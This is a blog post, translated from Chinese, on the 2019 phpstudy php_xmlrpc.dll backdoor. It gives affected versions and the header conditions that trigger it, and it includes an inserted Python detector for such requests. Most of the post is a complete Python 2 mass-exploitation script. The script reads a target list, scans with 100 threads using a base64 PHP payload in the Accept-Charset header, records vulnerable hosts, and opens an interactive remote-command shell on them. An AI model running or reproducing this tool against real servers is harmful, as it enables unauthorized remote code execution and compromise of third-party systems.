phpstudy backdoor
Author: Iamyc   25 September 2019, 10:29, Wednesday   Views: 329°   Indexed by Baidu

The phpstudy backdoor incident has been making a lot of noise these past few days, with all kinds of PoCs and exploits flying around.

I took some time today to look at it as well; t00ls (土司) also has a dedicated analysis of the backdoor. The affected versions and backdoored files are mainly:

phpstudy 2016:
php\php-5.2.17\ext\php_xmlrpc.dll
php\php-5.4.45\ext\php_xmlrpc.dll

phpstudy 2018:
PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll
PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll
Then I opened the phpstudy I normally use locally for code audits and switched the PHP version (most open-source CMSes nowadays require PHP 7, or at least PHP 5.6).


First, switch to 5.4.45 and capture the request with Burp:

Code execution, confirmed……

Switching to 5.2.17 also gives code execution.

When reproducing this, the main points to watch in the request are:

1. Accept-Charset: **** (this field is base64-encoded)

2. Accept-Encoding: gzip,deflate (the captured request normally has a space before "deflate"; it has to be removed)
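From the defender's side, those two request characteristics are exactly what a WAF rule or access-log review should key on. The following Python 3 script is an added example and not part of the original post: it parses a raw HTTP request (a constructed sample built from the header values shown above) and flags requests whose Accept-Encoding is exactly "gzip,deflate" with no space and whose Accept-Charset is a base64 string that decodes to PHP-looking code, which no normal browser sends.

```python
import base64
import binascii
import re

# Added example (not the post's code): detect requests that match the
# trigger conditions of the phpstudy php_xmlrpc.dll backdoor:
#   Accept-Encoding: gzip,deflate      (no space after the comma)
#   Accept-Charset: <base64 of PHP code>
PHP_HINTS = re.compile(r"(echo|system|eval|exec|passthru|shell_exec|\$_|<\?php)", re.I)


def parse_headers(raw_request):
    """Parse a raw HTTP/1.x request head into a dict keyed by lower-cased header name."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n")[1:]:  # skip the request line
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return headers


def decode_charset_payload(value):
    """Return the decoded Accept-Charset text if it is strict base64 UTF-8, else None.
    Real charset lists ("utf-8", "ISO-8859-1,utf-8;q=0.7") fail strict base64 decoding."""
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        return raw.decode("utf-8")
    except UnicodeDecodeError:
        return None


def is_backdoor_trigger(headers):
    """True when the parsed headers match the backdoor's trigger pattern."""
    if headers.get("accept-encoding") != "gzip,deflate":
        return False
    payload = decode_charset_payload(headers.get("accept-charset", ""))
    return payload is not None and bool(PHP_HINTS.search(payload))


# Constructed sample request using the Accept-Charset value shown in this post.
SAMPLE_TRIGGER = (
    "GET /index.php HTTP/1.1\r\n"
    "Host: 127.0.0.1\r\n"
    "Accept-Charset: ZWNobyAid2RuZ2ZAISN5Yy4uIjs=\r\n"
    "Accept-Encoding: gzip,deflate\r\n"
    "Connection: keep-alive\r\n\r\n"
)
# The same request as a browser would send it (space after the comma) is benign.
SAMPLE_BENIGN = SAMPLE_TRIGGER.replace("gzip,deflate", "gzip, deflate")
```

Feeding reconstructed requests from access logs or a proxy capture through is_backdoor_trigger() gives a simple, low-false-positive indicator that a backdoored php_xmlrpc.dll was being exercised.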

OK, since exploits are flying around everywhere, I'll post one too; it is a modified version of someone else's, and I am also planning to write a tool of my own for everyday use soon.



#!/usr/bin/env python2
#-*- encoding:utf-8 -*-
# YC:http://www.lang-v.com
# This is Python 2 code (print statements, Queue, raw_input); the shebang originally said python3.

import base64
import requests
import re
import time
import sys
import os
import ctypes
import Queue
import threading

all = Queue.Queue()       # queue of target URLs read from res.txt
lock = threading.RLock()  # serialises appends to success.txt across threads






def logo():
    log = """
    '*'        '*'    '*'*''*'
     '*'      '*'    *'*'
      '*'    '*'    *'*'
        '*' '*'     '*'
          '*'       '*'
          '*'       '*'
          '*'       *'*'
          '*'        *'*'
          '*'         '*'*''*'
    \n
    by yc:www.lang-v.com
    """
    print log


def write_shell():
    while not all.empty():
        url = all.get()
        url = url+"/index.php"
        print "Tring "+url
        headers = {
        'Upgrade-Insecure-Requests': '1',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml',
        'Accept-Language': 'zh-CN,zh;q=0.9',
        'accept-charset':'ZWNobyAid2RuZ2ZAISN5Yy4uIjs=',
        'Accept-Encoding': 'gzip,deflate',
        'Connection': 'keep-alive',
    }
        try:
            r = requests.get(url=url,headers=headers,timeout=10)
            r.close()
            if "wdngf@!#yc.." in r.text:
                print "[+] "+url
                with lock:
                    try:    
                        fxx = open('success.txt','a')
                        try:
                            fxx.write(str(url)+"\n")
                        finally:
                            fxx.close()
                    except:
                        pass
            else:
                pass

        except:
            pass


def header_by_command(command):
    new_header = {
        'Upgrade-Insecure-Requests': '1',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml',
        'Accept-Language': 'zh-CN,zh;q=0.9',
        'accept-charset':str(base64.b64encode(command.encode('utf-8'),'utf-8')),
        'Accept-Encoding': 'gzip,deflate',
        'Connection': 'keep-alive',
    }
    return new_header

# url = "http://xxx"
# write_shell(url=url,headers=headers)

def main():
    fp = open('res.txt','r')
    lists = fp.readlines()
    for url in lists:
        url = url.replace("\n","")
        url = url.replace("\r\n","")
        if "http" not in url:
            url = "http://"+url
        all.put(url)

    print "Reading over"
    for x in range(100):
        t1 = threading.Thread(target=write_shell,args=())
        t1.start()
        t1.join()

def shell():
    print "shell mod\n"
    try:
        fpp = open('success.txt','r')
        shell_raw = fpp.readlines()
        #print shell_raw
        j = 1
        for i in shell_raw:
            print "[+] "+str(j)+" "+i
            j = j+1
        fpp.close()
        print "Input shell num and command:\n"
        while True:
            
            num_str = raw_input("Number:->")
            num = int(num_str)
            command = raw_input("command:->")
            command = command+"echo \"yc!@#\";"
            new_header = header_by_command(command)
            shell_need = shell_raw[num-1].replace("\n","")
            #print new_header
            #print shell_raw[num-1]
            try:
                htmlshell = requests.get(url=shell_need,headers=new_header,timeout=10)
                #print htmlshell.content[0:200]
                res = re.findall('(.*?)yc!@#',htmlshell.content)
                print res[0]
            except:
                pass


    except:
        pass


if __name__=='__main__':
    logo()
    main()
    shell()



Result of running it:




Author: Iamyc      Title: phpstudy backdoor
URL: http://lang-v.com/first_cms/yc/emlog/src/?post=109
Copyright: unless otherwise noted, this article is an original post from "YC's Blog"; please keep the source attribution when reposting.
